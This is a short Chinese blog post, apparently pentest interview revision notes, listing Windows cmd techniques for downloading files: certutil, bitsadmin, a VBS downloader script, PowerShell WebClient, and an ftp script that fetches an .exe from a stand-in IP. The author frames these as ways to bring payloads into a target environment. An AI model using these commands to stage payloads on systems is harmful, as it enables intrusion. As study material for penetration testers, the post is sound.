cmd 环境下载文件的几种方法

今天渗透测试面试提到cmd下载文件  ,自己只写了jscertutil,还有几种常见的方法自己没想起来 这里记录和总结下 。

(自己还是太菜太垃圾。)

 

0x01 certutil

certutil 是一个证书工具,功能挺丰富的,参数非常多

cmd 环境下载文件的几种方法_第1张图片

 

certutil -urlcache -split -f http://xxxxxx
certutil -urlcache -split -f https://xxxxxx 1.txt #指定保存文件名

cmd 环境下载文件的几种方法_第2张图片

 cmd 环境下载文件的几种方法_第3张图片

 

 

 

0x02 bitsadmin

bitsadmin /transfer n http://www.xx.com/index.txt K:\111.txt

 

 cmd 环境下载文件的几种方法_第4张图片

 

 

 0x03 vbs

这里vbs下载用到代码:

iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

 

利用csript:执行脚本文件

 

K:\>cscript 1.vbs http://xxxxxx/index.txt 111.txt

cmd 环境下载文件的几种方法_第5张图片

 

 

 

0x04 powershell

powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/index.txt','K:\111.txt')

cmd 环境下载文件的几种方法_第6张图片

 

 

 

 

 

 

 

0x05 ftp

echo open 8.8.8.8  >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt

 

 

 

今天出去喝了点酒 还有几种渗透环境中下载payload的方式  先睡了。。

 


你可能感兴趣的:(cmd 环境下载文件的几种方法)